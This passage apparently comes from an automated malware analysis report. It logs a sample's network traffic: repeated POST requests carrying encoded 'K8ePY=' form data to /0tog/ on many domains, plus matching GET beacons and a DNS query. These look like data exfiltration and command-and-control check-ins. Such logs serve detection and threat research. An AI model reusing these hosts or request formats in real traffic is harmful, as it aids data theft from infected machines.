36 66 57 51 55 55 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=WyNoShgjoiwUJD61kUy_9t7gbwUN76tbEkqxpM~Sh2Ggj4gfUNDIrHwdgqfLq-1bJ0h6VvPQYD8HB2oQARtXgHCJTquhq5zONBYTvPu5tOXTl5e53DXbeX0QyOUINnj9(SsLpY5VtgmJyOQupjlZe7nGI7cAaUj_(MIuADNmnGOlNadwlUn6~z(-8FgeaxruRrJoH9eoGDaUou8drksBQOKllP02K5noxreJsjoPdBhuG_oP0BiFKxM1t6~PEl5D5PSD9RuUVlQ35WnKt-1WtXeoXYkz9GyD4-ASCaD_55yvBl7ytY9G~-ZONvaPNtwtG-cmm0j7zr5v~9mO6Kji97MwNIdreQ5dfAYtPgcLWa~fCmKwec(1boohVZfGkQpqdRUW0XdLQ9T6fWQUUw).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.splishysplashie.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.splishysplashie.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.splishysplashie.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 58 55 70 30 38 52 58 57 41 73 49 51 4c 4d 65 6b 49 41 70 69 46 49 55 43 77 6d 6c 52 57 35 76 74 78 57 5a 4c 52 43 58 37 77 68 41 32 74 67 4e 49 4b 70 4e 6f 4b 43 48 6f 56 4d 55 62 56 43 32 33 28 59 71 75 73 68 37 6d 45 4e 7e 4f 41 50 48 4e 45 43 68 34 52 75 79 53 44 54 4e 54 36 78 79 33 38 54 59 74 61 5a 53 44 52 66 44 68 32 78 54 52 66 55 57 64 64 4a 66 36 5a 55 34 6e 65 70 59 69 52 69 42 79 39 59 28 39 77 6a 28 73 77 58 4d 6d 5a 2d 62 63 32 64 6c 4f 42 6a 79 36 74 44 6e 42 54 77 39 6e 78 67 48 54 37 71 57 4f 48 59 30 5f 59 6f 7e 35 6e 37 6c 72 51 6f 50 43 67 62 33 46 67 53 69 63 32 35 4c 75 44 41 74 51 34 6d 36 59 36 63 6a 47 73 73 6a 4c 71 5a 72 7a 7a 67 31 58 4a 53 61 7a 78 4f 69 55 34 37 44 4c 5a 6f 66 64 6a 79 58 38 42 41 75 6d 71 43 43 78 6e 43 68 43 68 42 67 68 5a 68 45 65 36 58 33 74 43 35 52 50 74 45 43 37 54 62 51 79 6c 7a 73 37 70 54 7e 66 55 46 38 31 77 6d 74 52 28 43 70 69 73 2d 35 77 74 41 4d 32 45 77 6b 70 6f 4c 34 2d 49 53 34 55 43 39 79 56 58 6c 31 77 79 49 6c 5a 41 43 70 50 54 35 4b 47 47 62 79 55 74 46 79 31 4c 4b 6f 78 68 69 46 51 4c 58 57 4f 4f 46 4c 6b 47 53 71 63 64 5a 70 46 48 5a 36 4a 4d 4c 7e 6a 36 69 33 66 66 5f 48 68 43 78 34 71 5a 4b 6a 58 34 41 5a 62 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=XUp08RXWAsIQLMekIApiFIUCwmlRW5vtxWZLRCX7whA2tgNIKpNoKCHoVMUbVC23(Yqush7mEN~OAPHNECh4RuySDTNT6xy38TYtaZSDRfDh2xTRfUWddJf6ZU4nepYiRiBy9Y(9wj(swXMmZ-bc2dlOBjy6tDnBTw9nxgHT7qWOHY0_Yo~5n7lrQoPCgb3FgSic25LuDAtQ4m6Y6cjGssjLqZrzzg1XJSazxOiU47DLZofdjyX8BAumqCCxnChChBghZhEe6X3tC5RPtEC7TbQylzs7pT~fUF81wmtR(Cpis-5wtAM2EwkpoL4-IS4UC9yVXl1wyIlZACpPT5KGGbyUtFy1LKoxhiFQLXWOOFLkGSqcdZpFHZ6JML~j6i3ff_HhCx4qZKjX4AZbCA).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.ugpounds.infoConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.ugpounds.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ugpounds.info/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 6a 78 59 68 5a 6e 34 33 31 72 6e 70 52 2d 42 49 39 56 34 44 57 35 64 51 6c 4e 4a 65 35 38 6c 34 6d 67 7e 64 33 77 4d 41 70 49 61 76 72 35 61 45 79 57 4c 30 6a 43 30 4e 49 45 56 72 6e 77 56 75 79 65 34 35 6e 6d 66 33 43 74 62 54 45 75 62 68 77 59 53 46 33 7a 52 37 6e 78 50 69 31 52 68 54 30 69 66 6c 48 45 4a 79 51 6b 46 32 38 77 4d 6c 77 53 4d 74 31 41 41 77 32 74 76 37 42 72 36 71 68 50 44 70 51 2d 45 35 38 52 32 4c 74 31 7e 7a 54 33 65 66 44 42 78 65 4f 43 63 30 72 5f 78 30 59 47 7e 51 6a 33 72 76 79 4c 48 39 55 33 66 50 6e 5f 59 6f 65 48 7a 4e 77 31 39 35 50 38 51 45 6c 65 69 6d 77 6d 49 51 6a 58 46 57 30 5a 44 44 4c 4d 6f 78 67 38 34 61 28 57 7a 39 7a 66 46 6b 67 4c 66 2d 41 64 37 56 74 43 6d 39 6a 5f 72 7a 4c 35 6f 6d 79 49 76 36 65 47 39 55 54 50 66 58 70 4d 4d 59 35 59 45 56 51 76 7a 4a 4c 39 64 50 6c 57 73 4f 28 74 6e 54 36 46 63 32 30 51 69 4f 28 5a 34 70 6a 5a 68 67 62 46 37 5a 6f 55 47 32 4a 78 52 39 56 6f 43 74 69 39 4b 53 42 6a 65 38 4d 67 4b 46 53 4d 65 78 42 37 42 67 4f 54 71 61 48 73 30 4b 4e 35 4b 43 65 4e 41 64 46 65 31 59 55 6c 6a 33 4d 73 56 31 73 6a 30 38 4a 4b 61 2d 4f 2d 31 54 65 74 38 6f 44 4b 78 49 70 2d 68 6f 51 4d 39 75 30 45 45 78 4d 4f 28 38 56 69 63 75 6a 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=jxYhZn431rnpR-BI9V4DW5dQlNJe58l4mg~d3wMApIavr5aEyWL0jC0NIEVrnwVuye45nmf3CtbTEubhwYSF3zR7nxPi1RhT0iflHEJyQkF28wMlwSMt1AAw2tv7Br6qhPDpQ-E58R2Lt1~zT3efDBxeOCc0r_x0YG~Qj3rvyLH9U3fPn_YoeHzNw195P8QEleimwmIQjXFW0ZDDLMoxg84a(Wz9zfFkgLf-Ad7VtCm9j_rzL5omyIv6eG9UTPfXpMMY5YEVQvzJL9dPlWsO(tnT6Fc20QiO(Z4pjZhgbF7ZoUG2JxR9VoCti9KSBje8MgKFSMexB7BgOTqaHs0KN5KCeNAdFe1YUlj3MsV1sj08JKa-O-1Tet8oDKxIp-hoQM9u0EExMO(8VicujA).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.kuralike.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.kuralike.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kuralike.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 71 48 4e 53 63 6a 73 38 57 66 4a 50 66 68 5a 52 76 33 66 75 61 56 52 48 44 43 39 59 58 79 46 46 28 73 4d 45 6b 66 79 70 58 44 31 61 55 47 34 58 6e 6e 56 50 65 4a 28 73 42 31 75 76 49 33 37 4b 71 49 75 54 54 2d 54 32 7e 79 49 48 34 62 39 47 54 66 4c 49 5a 69 6d 4d 44 34 41 50 43 31 4a 4b 6f 38 69 76 61 33 48 59 59 4d 61 4d 4f 57 7a 38 4d 58 6a 34 33 54 50 49 72 43 7e 72 69 69 53 63 39 71 55 77 77 68 4c 52 59 34 74 32 67 37 44 49 34 4f 48 66 52 65 35 47 43 32 64 61 76 73 63 6e 61 5f 42 7a 75 6b 30 56 6b 6a 70 37 52 62 7e 69 37 2d 6e 55 38 69 33 73 34 4d 30 32 54 4c 6c 30 43 70 30 65 59 73 71 71 56 67 4d 70 63 44 4a 66 6c 4e 7a 51 31 7a 6b 34 6b 79 37 48 38 47 33 69 34 54 70 73 36 76 4a 30 64 43 66 56 69 74 7e 65 76 68 64 7a 64 52 73 43 31 53 67 70 68 6f 30 70 44 78 4c 55 43 44 4e 4f 39 37 59 6a 71 56 6e 46 4f 66 45 45 53 70 74 49 62 5a 37 56 39 69 38 78 58 77 58 70 4d 34 31 5a 72 49 35 6a 6e 54 79 71 38 6b 7a 5a 48 74 77 46 4e 66 39 5a 49 43 78 63 4b 63 71 6e 73 46 63 71 6a 41 57 2d 33 73 53 6c 72 4e 65 49 6f 35 54 58 70 55 37 57 79 70 28 35 4c 61 28 42 43 55 53 70 64 6d 6e 44 51 72 70 5f 7a 69 69 5a 44 73 64 75 46 39 6a 61 76 43 36 70 78 59 44 44 77 30 59 7a 5a 63 54 49 28 78 46 31 4e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=qHNScjs8WfJPfhZRv3fuaVRHDC9YXyFF(sMEkfypXD1aUG4XnnVPeJ(sB1uvI37KqIuTT-T2~yIH4b9GTfLIZimMD4APC1JKo8iva3HYYMaMOWz8MXj43TPIrC~riiSc9qUwwhLRY4t2g7DI4OHfRe5GC2davscna_Bzuk0Vkjp7Rb~i7-nU8i3s4M02TLl0Cp0eYsqqVgMpcDJflNzQ1zk4ky7H8G3i4Tps6vJ0dCfVit~evhdzdRsC1Sgpho0pDxLUCDNO97YjqVnFOfEESptIbZ7V9i8xXwXpM41ZrI5jnTyq8kzZHtwFNf9ZICxcKcqnsFcqjAW-3sSlrNeIo5TXpU7Wyp(5La(BCUSpdmnDQrp_ziiZDsduF9javC6pxYDDw0YzZcTI(xF1Nw).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cdershoushichang.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cdershoushichang.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cdershoushichang.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 37 7a 75 38 35 2d 54 49 63 49 32 61 63 49 47 32 37 33 37 31 55 74 44 46 63 46 36 79 76 65 5a 5a 61 36 4f 5f 42 61 46 4b 43 30 4c 31 34 45 4e 4e 6d 55 50 72 6e 72 28 62 42 52 7a 71 52 50 38 49 7e 34 63 66 66 6e 54 33 52 55 65 71 69 4c 42 6d 58 46 39 55 44 41 50 4d 36 68 51 63 33 76 39 43 6f 6e 51 31 5a 66 4d 49 6b 6d 6a 64 36 77 30 42 56 58 78 79 4f 38 4b 5f 65 71 4d 55 28 42 44 73 67 78 75 6e 5a 33 36 55 50 37 69 39 76 45 70 66 46 76 6c 6d 6a 54 7a 48 6b 7a 70 46 39 6b 45 77 57 43 48 36 48 58 62 66 69 31 32 78 76 49 59 74 38 4a 78 52 44 54 75 37 54 78 69 45 48 55 6e 58 34 4d 32 43 79 4a 50 62 7e 72 62 37 39 30 39 35 74 4a 52 7a 34 31 64 46 4f 62 28 71 42 71 75 66 32 6d 53 49 34 51 79 72 79 65 31 47 28 35 33 6a 65 68 49 7a 35 63 47 44 36 37 6c 67 38 37 38 62 64 6a 55 4d 42 5f 35 36 69 74 66 35 37 35 47 66 67 64 57 69 6f 5f 7e 48 69 31 67 35 59 34 78 58 67 62 72 4f 54 35 33 6d 71 36 77 46 56 79 54 58 70 31 30 39 42 41 4c 7a 43 44 65 55 57 49 79 38 54 36 48 53 41 2d 48 4a 74 79 6a 79 35 45 51 6f 62 46 4c 67 31 4b 56 6e 78 41 63 72 32 51 39 51 4a 49 47 6c 76 57 78 4d 72 54 73 73 35 71 56 37 69 65 57 4b 34 4b 73 35 6d 78 4e 57 70 30 78 65 35 6c 77 41 56 58 74 6d 4c 73 6e 4d 48 6b 6a 5f 71 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=7zu85-TIcI2acIG27371UtDFcF6yveZZa6O_BaFKC0L14ENNmUPrnr(bBRzqRP8I~4cffnT3RUeqiLBmXF9UDAPM6hQc3v9ConQ1ZfMIkmjd6w0BVXxyO8K_eqMU(BDsgxunZ36UP7i9vEpfFvlmjTzHkzpF9kEwWCH6HXbfi12xvIYt8JxRDTu7TxiEHUnX4M2CyJPb~rb79095tJRz41dFOb(qBquf2mSI4Qyrye1G(53jehIz5cGD67lg878bdjUMB_56itf575GfgdWio_~Hi1g5Y4xXgbrOT53mq6wFVyTXp109BALzCDeUWIy8T6HSA-HJtyjy5EQobFLg1KVnxAcr2Q9QJIGlvWxMrTss5qV7ieWK4Ks5mxNWp0xe5lwAVXtmLsnMHkj_qw).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cakoi.xyzConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cakoi.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cakoi.xyz/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 4a 48 4a 55 79 77 32 39 35 36 6c 5a 70 67 4a 54 71 5a 6b 4f 54 5f 70 43 73 62 4f 75 7e 76 61 30 71 64 42 62 28 7a 55 44 47 36 6d 65 69 57 31 5f 38 5a 41 78 39 74 64 62 4e 34 6e 6b 6d 68 6d 4a 44 4b 58 37 66 50 37 78 70 68 52 69 41 57 52 36 65 56 74 32 33 37 42 67 69 34 76 66 54 37 7a 47 4c 74 6f 74 73 4e 54 52 7e 6d 4f 55 4e 63 73 4f 68 4c 78 53 35 59 36 70 28 74 4d 53 33 63 66 2d 4a 52 44 59 58 68 68 74 71 4a 54 48 4a 6d 48 6e 6b 6d 6a 4f 37 41 7e 69 75 64 71 79 67 6a 28 78 47 6d 7e 30 46 46 41 61 71 48 51 4b 74 4b 38 36 61 4d 55 75 62 33 56 37 44 44 64 62 43 61 44 55 79 41 63 6c 38 2d 58 6d 36 7a 53 46 68 79 62 44 50 41 48 6b 41 52 45 6a 78 59 4d 4d 55 61 61 32 6d 49 5a 67 4b 79 4e 78 65 6c 36 43 6f 66 42 31 4d 48 57 63 70 5a 30 4c 50 51 75 4d 39 51 52 78 43 57 32 52 50 75 43 62 33 62 7a 66 56 56 62 64 54 39 6b 32 7a 73 6a 59 54 7a 39 43 5a 41 46 62 41 6f 53 41 71 6a 5a 59 6c 66 52 50 45 6d 75 76 4f 4e 44 34 6d 7a 37 71 68 5f 4c 43 33 62 66 6a 7a 6b 75 50 59 74 6f 34 73 52 53 7a 79 5a 4c 42 63 32 49 33 77 36 57 2d 57 5f 4b 5f 6e 78 53 36 6a 30 6a 70 4a 44 4e 44 54 74 4d 39 57 34 42 7a 6d 6a 72 43 57 77 43 37 69 47 59 49 77 5a 49 34 54 42 50 5f 72 51 50 69 72 31 44 5a 64 75 6e 73 79 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=JHJUyw2956lZpgJTqZkOT_pCsbOu~va0qdBb(zUDG6meiW1_8ZAx9tdbN4nkmhmJDKX7fP7xphRiAWR6eVt237Bgi4vfT7zGLtotsNTR~mOUNcsOhLxS5Y6p(tMS3cf-JRDYXhhtqJTHJmHnkmjO7A~iudqygj(xGm~0FFAaqHQKtK86aMUub3V7DDdbCaDUyAcl8-Xm6zSFhybDPAHkAREjxYMMUaa2mIZgKyNxel6CofB1MHWcpZ0LPQuM9QRxCW2RPuCb3bzfVVbdT9k2zsjYTz9CZAFbAoSAqjZYlfRPEmuvOND4mz7qh_LC3bfjzkuPYto4sRSzyZLBc2I3w6W-W_K_nxS6j0jpJDNDTtM9W4BzmjrCWwC7iGYIwZI4TBP_rQPir1DZdunsyQ).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.davabeauty.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.davabeauty.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.davabeauty.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 6f 64 6a 79 4d 6d 76 72 6f 6c 48 71 30 71 53 54 4a 63 75 37 58 39 62 38 6d 45 6c 72 72 73 58 48 48 44 69 35 76 50 61 33 33 38 6d 61 5a 4f 79 68 58 38 32 4f 6e 51 6e 5a 62 66 4b 71 59 38 4e 76 57 38 69 61 41 7a 79 70 33 5a 4f 44 76 57 47 47 66 5a 62 33 7e 58 47 41 52 64 69 59 56 76 39 36 58 4f 42 31 69 68 67 67 65 38 68 6a 35 4c 37 4d 32 6d 43 49 32 74 45 51 64 4b 4f 70 6e 7a 4f 34 69 44 79 49 4a 52 64 52 47 51 4a 5a 7a 6d 68 72 65 33 50 4a 46 53 46 41 6f 35 58 65 6d 50 62 4b 6a 32 36 5f 69 73 50 4c 6a 6a 63 6c 78 7a 6c 36 52 37 77 4f 4e 6a 79 31 47 78 50 67 76 62 69 77 44 50 61 47 41 4b 34 43 61 5f 47 55 37 75 42 41 41 36 7e 6e 41 76 69 48 6e 47 33 49 6b 33 4d 71 7a 77 62 6b 77 44 6d 39 37 54 33 39 34 50 28 47 48 70 52 42 78 70 56 71 71 73 73 34 55 4c 57 32 42 57 64 52 44 62 53 2d 76 7a 33 6d 63 6d 56 46 38 61 61 67 78 31 58 69 4a 54 42 5a 72 78 31 6e 75 7a 6b 5f 64 68 4f 4e 35 6b 6b 2d 51 46 57 76 73 2d 36 43 59 45 6b 58 71 47 54 66 64 4a 42 6e 67 63 70 6a 37 46 4e 5f 67 70 4e 67 5a 6b 61 49 4d 70 37 56 34 5a 72 48 30 4b 41 64 78 63 51 2d 42 58 41 77 6d 5a 51 6e 59 6e 75 35 5a 55 49 75 28 42 32 59 33 74 48 65 52 72 66 77 58 32 4b 61 32 31 28 76 6d 33 72 51 66 70 30 6d 72 34 61 6c 44 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=odjyMmvrolHq0qSTJcu7X9b8mElrrsXHHDi5vPa338maZOyhX82OnQnZbfKqY8NvW8iaAzyp3ZODvWGGfZb3~XGARdiYVv96XOB1ihgge8hj5L7M2mCI2tEQdKOpnzO4iDyIJRdRGQJZzmhre3PJFSFAo5XemPbKj26_isPLjjclxzl6R7wONjy1GxPgvbiwDPaGAK4Ca_GU7uBAA6~nAviHnG3Ik3MqzwbkwDm97T394P(GHpRBxpVqqss4ULW2BWdRDbS-vz3mcmVF8aagx1XiJTBZrx1nuzk_dhON5kk-QFWvs-6CYEkXqGTfdJBngcpj7FN_gpNgZkaIMp7V4ZrH0KAdxcQ-BXAwmZQnYnu5ZUIu(B2Y3tHeRrfwX2Ka21(vm3rQfp0mr4alDQ).
          Source: global trafficHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.icfc-lr.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.icfc-lr.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.icfc-lr.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 74 77 7e 38 57 64 4b 48 5a 4c 38 45 73 31 6e 34 6a 74 6a 4a 38 35 4c 35 70 72 37 63 7e 50 38 59 7a 35 65 54 72 41 70 72 62 59 6c 48 68 61 50 39 4c 56 42 51 30 4b 78 75 74 59 79 54 4d 2d 42 35 4c 7a 63 75 68 34 62 31 69 31 45 64 4d 6f 70 6e 69 2d 68 59 65 36 57 76 6d 72 5a 70 71 38 45 56 42 42 53 6f 6f 41 51 64 7e 53 6a 43 4d 47 63 52 57 50 52 53 6f 48 63 49 4d 2d 39 76 54 31 41 58 4e 45 43 7a 47 5f 33 4f 6d 36 4b 5f 45 36 74 6e 42 66 31 6e 67 76 61 75 69 63 6d 46 7a 72 72 65 41 70 78 31 69 74 6a 63 78 44 31 74 7e 6f 58 66 65 61 6d 4b 6f 5f 4c 4b 64 55 45 5a 6d 43 73 6f 79 57 45 34 66 4e 46 5f 63 68 28 35 59 44 48 61 50 58 4c 75 32 7a 68 38 76 37 63 34 59 2d 61 64 45 58 4b 6f 57 67 45 56 4d 33 4f 4c 6b 69 67 42 79 4d 5a 52 53 52 6f 74 6b 42 34 55 6d 41 43 64 51 2d 55 61 73 77 69 34 7a 62 36 6d 77 44 46 38 6e 54 6b 70 77 37 71 43 56 79 48 51 39 63 52 30 28 50 41 31 6e 79 6b 76 64 53 6a 5f 41 45 69 79 79 74 52 64 4b 59 41 65 44 46 48 4b 54 66 51 6d 4d 53 42 5f 62 55 72 76 76 50 43 33 79 35 46 74 41 6d 57 76 36 5f 54 78 37 7a 65 70 76 6c 68 61 61 30 4a 4e 6f 30 36 2d 79 62 31 68 50 48 75 43 48 49 79 56 73 77 65 62 32 5a 4d 48 79 77 78 73 67 64 34 63 33 6a 37 31 41 61 62 5a 45 49 5a 54 75 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=tw~8WdKHZL8Es1n4jtjJ85L5pr7c~P8Yz5eTrAprbYlHhaP9LVBQ0KxutYyTM-B5Lzcuh4b1i1EdMopni-hYe6WvmrZpq8EVBBSooAQd~SjCMGcRWPRSoHcIM-9vT1AXNECzG_3Om6K_E6tnBf1ngvauicmFzrreApx1itjcxD1t~oXfeamKo_LKdUEZmCsoyWE4fNF_ch(5YDHaPXLu2zh8v7c4Y-adEXKoWgEVM3OLkigByMZRSRotkB4UmACdQ-Uaswi4zb6mwDF8nTkpw7qCVyHQ9cR0(PA1nykvdSj_AEiyytRdKYAeDFHKTfQmMSB_bUrvvPC3y5FtAmWv6_Tx7zepvlhaa0JNo06-yb1hPHuCHIyVsweb2ZMHywxsgd4c3j71AabZEIZTuA).
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=WAnq49OZtUlVoL/HnvBIdWMBLlOF4zZrZ69KoLBF6QuqfC3NtN9xH0oAOI3RR7LT9klu&uTrL=ArghXbG HTTP/1.1Host: www.smileyefero.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=ZtwHo4rcg6kY+oKBKGmDUJHc3TV2USuBeLhI4qVraQDetVBqj1irZ6xIt6IyyZwRRl8c&uTrL=ArghXbG HTTP/1.1Host: www.cxyl968.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=PusX7byL57M2YYa4nNlIjQSbI2y9oy+NyluH5iYGJdPErjOrRpjLqtGKatonovN7h70m&uTrL=ArghXbG HTTP/1.1Host: www.bestselfietools.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=0HRdnbOcFNnxvyqGcVRvrrLsbqQ9r15luAj7Zds+T+sucbkdrSSKiOrsMjTBx8eXU9lb&uTrL=ArghXbG HTTP/1.1Host: www.homecaredispatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=Zw5SMG8LqDk2YgvF1TbiqrHOLlMCwY9PXyT/3tCGwzSgj8pOa/e/s2Jc6JGsv8dePUVF&uTrL=ArghXbG HTTP/1.1Host: www.netrworksoultions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=YWdOi2HWMsssXNHLXFcnHd0z835yY7ryqR01DxX99DAAjRhjb58wIVulD8h5ehWU5+2Z&uTrL=ArghXbG HTTP/1.1Host: www.splishysplashie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=szsbHHEa8Z34Dvcr8ggFBf0+sO9O8s5D9HLjjzg3ltezu5OazjebzGlObkZU0CN2gu4p&uTrL=ArghXbG HTTP/1.1Host: www.ugpounds.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=lF5oCHYtU8NdNx0d23GGFix6DipSWwZzlMB9xev3ejNmYk0/3E8qaZy8VFiZaknF39Wz&uTrL=ArghXbG HTTP/1.1Host: www.kuralike.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=0xaGnbbnQYzuNYvkhy/sTqjZMVShuqNfLb/uaoFgDn+28nRXiEn9ntqddgr1RONYrtxd&uTrL=ArghXbG HTTP/1.1Host: www.cdershoushichang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=GF9usWOs6Zom8CUcoM9HTLdEnbH/87GB74cAi0EjR4aCsk9v8LlL6JBcR57llzuoSfvQ&uTrL=ArghXbG HTTP/1.1Host: www.cakoi.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=nfXISCjkjF7o09PEfrvvWtjdlx5A9d/AXTzo14C36Z6FZ6yyZM+c1gbaB/GDS9tLL8uG&uTrL=ArghXbG HTTP/1.1Host: www.davabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0tog/?K8ePY=iyKGI9upEL4Yziuw+rqQi4DZsZrOo+I4mtWVwzFVTdhPpZPYbFAk464txuKcB7xLLFg9&uTrL=ArghXbG HTTP/1.1Host: www.icfc-lr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.smileyefero.com
          Source: unknownHTTP traffic detected: POST /0tog/ HTTP/1.1Host: www.cxyl968.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.cxyl968.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.cxyl968.com/0tog/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 4b 38 65 50 59 3d 57 76 45 39 32 66 32 71 67 71 39 72 68 4c 6e 65 64 6e 62 65 4b 4e 4b 39 31 57 39 77 61 43 71 77 41 65 30 47 6a 6f 78 44 61 53 54 38 72 30 78 36 73 77 6e 67 52 2d 30 4d 31 4c 30 41 39 71 6b 57 44 44 77 56 55 72 62 79 47 6c 7a 48 72 4a 41 49 47 66 76 31 79 4b 5a 46 6e 74 39 32 72 6e 52 6c 77 30 28 56 4a 5f 36 6d 76 5f 6c 70 48 71 39 32 79 61 68 6b 66 6b 54 47 4f 57 5a 77 49 4d 69 50 38 51 4c 41 6e 57 52 66 6c 64 72 66 6c 38 31 6f 76 76 52 6f 69 76 64 6c 45 45 53 43 28 49 4c 4b 75 39 64 4f 6f 70 48 49 6b 47 38 79 58 32 48 36 35 5f 34 32 4f 73 76 74 67 78 52 31 62 6d 51 51 48 47 67 49 7e 58 47 30 45 57 44 41 73 55 28 66 46 6a 30 68 72 6a 62 56 39 79 4f 4c 4a 42 67 46 33 66 62 68 75 74 66 5a 61 42 6f 47 32 73 7a 45 42 68 59 4f 67 51 7a 6d 69 34 63 41 76 53 4b 63 50 30 6f 5a 74 56 5a 6f 46 6e 33 75 32 50 70 53 73 68 49 66 53 56 46 37 68 6d 76 6b 49 79 4b 41 79 68 34 4b 69 7a 43 69 39 77 42 43 4a 4a 32 5a 77 63 54 42 69 57 64 37 36 71 53 72 71 4e 50 49 58 71 4a 67 4a 49 34 4f 42 44 45 47 5a 34 65 4a 44 50 77 57 4f 55 74 69 4c 77 48 5a 4d 53 71 48 72 6d 63 43 55 49 4b 65 70 49 4d 63 7e 63 6f 56 56 4f 55 72 67 37 68 6a 4d 55 39 53 47 53 54 36 57 67 78 73 38 4f 32 73 36 61 47 45 49 5a 49 66 6e 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: K8ePY=WvE92f2qgq9rhLnednbeKNK91W9waCqwAe0GjoxDaST8r0x6swngR-0M1L0A9qkWDDwVUrbyGlzHrJAIGfv1yKZFnt92rnRlw0(VJ_6mv_lpHq92yahkfkTGOWZwIMiP8QLAnWRfldrfl81ovvRoivdlEESC(ILKu9dOopHIkG8yX2H65_42OsvtgxR1bmQQHGgI~XG0EWDAsU(fFj0hrjbV9yOLJBgF3fbhutfZaBoG2szEBhYOgQzmi4cAvSKcP0oZtVZoFn3u2PpSshIfSVF7hmvkIyKAyh4KizCi9wBCJJ2ZwcTBiWd76qSrqNPIXqJgJI4OBDEGZ4eJDPwWOUtiLwHZMSqHrmcCUIKepIMc~coVVOUrg7hjMU9SGST6Wgxs8O2s6aGEIZIfnA).
